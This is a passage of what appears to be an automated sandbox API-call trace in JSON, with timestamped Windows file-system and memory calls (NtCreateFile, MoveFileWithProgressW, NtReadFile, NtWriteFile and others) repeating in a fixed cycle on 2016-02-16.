"NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:51,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:51,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,556", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,586", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:51,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 